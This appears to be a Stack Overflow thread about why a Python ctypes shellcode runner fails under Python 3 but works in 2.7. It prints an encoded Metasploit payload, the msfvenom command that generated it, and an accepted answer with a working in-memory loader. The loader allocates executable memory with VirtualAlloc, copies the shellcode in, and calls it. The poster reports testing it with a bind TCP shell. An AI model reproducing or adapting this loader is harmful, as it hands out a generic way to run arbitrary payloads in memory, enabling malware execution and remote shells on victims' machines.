# CTYPES access violation writing with python3.8 while 2.7 works

Tags: python, python-3.x, ctypes

I create some shellcode to pop up calc.exe on Windows. The shellcode is in the variable `buf` (omitted here for space). With python2.7 it works and the calculator appears. 
With python 3, it fails with `OSError: exception: access violation writing 0x00000023EE895F650` (memory location differs on each run).

Here's the code. As I understand it, `create_string_buffer` will automatically allocate space to match the length of `buf` and `CFUNCTYPE` will use `null` in place of python's `None`.

```
# Win10 Pro 10.0.1863 x64
# Python 2.7.1 32bit win32
# Python 3.8.3 32bit win32 
import ctypes
buf =  b""
buf += b"\xbd\x46\x90\xe4\x4e\xdb\xc8\xd9\x74\x24\xf4\x58\x2b"
buf += b"\xc9\xb1\x31\x31\x68\x13\x83\xe8\xfc\x03\x68\x49\x72"
buf += b"\x11\xb2\xbd\xf0\xda\x4b\x3d\x95\x53\xae\x0c\x95\x00"
buf += b"\xba\x3e\x25\x42\xee\xb2\xce\x06\x1b\x41\xa2\x8e\x2c"
buf += b"\xe2\x09\xe9\x03\xf3\x22\xc9\x02\x77\x39\x1e\xe5\x46"
buf += b"\xf2\x53\xe4\x8f\xef\x9e\xb4\x58\x7b\x0c\x29\xed\x31"
buf += b"\x8d\xc2\xbd\xd4\x95\x37\x75\xd6\xb4\xe9\x0e\x81\x16"
buf += b"\x0b\xc3\xb9\x1e\x13\x00\x87\xe9\xa8\xf2\x73\xe8\x78"
buf += b"\xcb\x7c\x47\x45\xe4\x8e\x99\x81\xc2\x70\xec\xfb\x31"
buf += b"\x0c\xf7\x3f\x48\xca\x72\xa4\xea\x99\x25\x00\x0b\x4d"
buf += b"\xb3\xc3\x07\x3a\xb7\x8c\x0b\xbd\x14\xa7\x37\x36\x9b"
buf += b"\x68\xbe\x0c\xb8\xac\x9b\xd7\xa1\xf5\x41\xb9\xde\xe6"
buf += b"\x2a\x66\x7b\x6c\xc6\x73\xf6\x2f\x8c\x82\x84\x55\xe2"
buf += b"\x85\x96\x55\x52\xee\xa7\xde\x3d\x69\x38\x35\x7a\x85"
buf += b"\x72\x14\x2a\x0e\xdb\xcc\x6f\x53\xdc\x3a\xb3\x6a\x5f"
buf += b"\xcf\x4b\x89\x7f\xba\x4e\xd5\xc7\x56\x22\x46\xa2\x58"
buf += b"\x91\x67\xe7\x3a\x74\xf4\x6b\x93\x13\x7c\x09\xeb"

def run():
    buffer = ctypes.create_string_buffer(buf)
    shell_func = ctypes.cast(buffer, ctypes.CFUNCTYPE(None))
    shell_func()

if __name__ == '__main__':
    run()
```

I've read and googled but have no idea on why it won't work in Python3.
Any ideas?

FWIW, here is how I created the shellcode:

```
# Linux kali 5.6.0-kali1-amd64
# metasploit v5.0.89-dev
msfvenom -p windows/exec -e x86/shikata_ga_nai -i 1 -f python cmd=calc.exe
```

Comment: why the downvote?

Comment: Don't omit the shellcode.

Comment: The allocated buffer memory is not executable. Just tested it on a debugger. Try copying your buffer into allocation made by `VirtualAlloc()` with `PAGE_EXECUTE_READWRITE`.

Comment: @Neitsa, thanks. I have it working now. If you will make your comment an answer I'll mark it solved.ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
            ctypes.c_int(length),
            ctypes.c_int(0x3000),
            ctypes.c_int(0x40)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
            buffer, ctypes.c_int(len(shellcode)))

Answer (score 2, accepted):

Thanks to Neitsa's comment, here is the code that works. Using shellcode as above, or your own in a variable called `buf`:

```
def run():
    buffer = ctypes.create_string_buffer(buf)
    length = len(buffer)

    ptr = ctypes.windll.kernel32.VirtualAlloc(None, length, 0x1000|0x2000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(ptr, buffer, length)
    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
    shell_func()

if __name__ == '__main__':
    run()
```

First, allocate enough memory to hold the shellcode. The two constants in `VirtualAlloc` define

- `0x1000|0x2000` = MEM_COMMIT | MEM_RESERVE (see MS docs)
- `0x40` PAGE_EXECUTE_READWRITE

Next, move the shellcode into the allocated memory.
Finally, cast the shellcode as a function and call the function.
Tested with shellcode given in question (popup calculator) and with a bind tcp shell (not shown).

Still don't know exactly why python3 behaves differently but looks like it's trying to write to non-executable memory. This method works with Python2 or Python3.

Comment: This method won't work on python 64bits because VirtualAlloc will return only 4 bytes but you need 8 for high addresses in 64bits. See [this answer](https://stackoverflow.com/questions/62036405/how-to-run-shellcode-in-python-3/67403939#67403939)